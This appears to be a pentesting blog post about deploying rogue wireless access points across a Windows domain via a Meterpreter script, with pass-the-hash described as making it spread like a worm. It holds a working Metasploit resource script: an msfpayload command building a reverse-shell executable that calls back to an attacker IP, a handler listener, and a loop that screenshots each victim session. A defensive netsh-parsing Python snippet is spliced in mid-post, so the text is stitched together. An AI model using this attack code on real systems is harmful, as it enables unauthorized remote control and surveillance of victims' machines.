
[Pentesting] Deploying rogue ap points throughout a domain

By Zitstif
 

This post is aimed at pentesters and anyone else who is curious!

For penetration testers, this script makes it easier to set up rogue wireless access points: it uses the soft AP feature built into Windows 7 and Windows 2008.

If the victim computers are part of a Windows domain and have wireless NICs, then by automating Metasploit with a pass-the-hash attack and running this script, one could essentially automate deploying a series of rogue APs throughout the domain. This would behave much like a network worm.

The Meterpreter script assumes that you have AT LEAST Administrator privileges! You need to obtain those privileges before running the script.
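From the defender's side, the soft AP feature the script relies on is visible on every host as the wireless "hosted network" state, so an inventory or endpoint check can flag a domain workstation that has one running. The following is an added example, not code from this post or from the script it describes: it parses the report format of the Windows `netsh wlan show hostednetwork` command (the sample output below is constructed, not captured from a real machine) and classifies the host for a detection rule.

```python
import re
from typing import Dict

# Constructed sample of `netsh wlan show hostednetwork` output; the field
# names follow the command's report layout, the values are made up.
SAMPLE_OUTPUT = """\
Hosted network settings
-----------------------
    Mode                   : Allowed
    SSID name              : "FreeWiFi"
    Max number of clients  : 100
    Authentication         : WPA2-Personal
    Cipher                 : CCMP

Hosted network status
---------------------
    Status                 : Started
    BSSID                  : 00:11:22:33:44:55
    Radio type             : 802.11n
    Channel                : 6
    Number of clients      : 2
"""

# One "Key : value" report line; section titles and dashed rules have no colon.
FIELD_RE = re.compile(r"^\s*(?P<key>[A-Za-z ]+?)\s*:\s*(?P<value>.*?)\s*$")


def parse_hostednetwork(text: str) -> Dict[str, str]:
    """Collect the key/value lines of the report into a dict (quotes stripped)."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m.group("key").strip()] = m.group("value").strip('"')
    return fields


def assess_hostednetwork(text: str) -> dict:
    """Classify the host: a started hosted network on a managed workstation
    is a rogue-AP indicator ('alert'); merely allowed is worth a 'warn'."""
    f = parse_hostednetwork(text)
    allowed = f.get("Mode", "").lower() == "allowed"
    started = f.get("Status", "").lower() == "started"
    clients = f.get("Number of clients", "0")
    severity = "alert" if started else ("warn" if allowed else "ok")
    return {"allowed": allowed, "started": started,
            "ssid": f.get("SSID name", ""),
            "clients": int(clients) if clients.isdigit() else 0,
            "severity": severity}
```

On a real host the text would come from running the command (for example via `subprocess`) rather than the embedded sample.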

Example of use with a Metasploit console resource (RC) script (download it!):
 

# Quick RC script to demonstrate the Ruby blocks in RC files
#

#
# Generate a corresponding EXE using msfpayload (change 192.168.0.228 to your IP):
# $ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.228 LPORT=4444 X > reverse.exe
#

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4444
set LHOST 192.168.0.228
set ExitOnSession false

exploit -j

# The first sleep below is not necessary, but makes the output cleaner
<ruby>
	sleep(1)

	print_status("Waiting on an incoming sessions...")
	while (true)
		framework.sessions.each_pair do |sid,s|
			thost = s.tunnel_peer.split(":")[0]

			# Ensure that stdapi has been loaded before running
			if s.ext.aliases['stdapi']
				print_status("Screenshotting session #{sid} #{thost}...")
				s.console.run_single("screenshot -p #{thost}_#{sid}.jpg -v false -q 85")
				print_status("Closing session #{sid} #{thost}...")
				s.kill
			else
				print_status("Session #{sid} #{thost} active, but not yet configured")
			end

		end
		sleep(1)
	end

	print_status("All done")
</ruby>

# Kill all open sessions
sessions -K

# Exit the console (optional)
exit


Download rogue AP script.
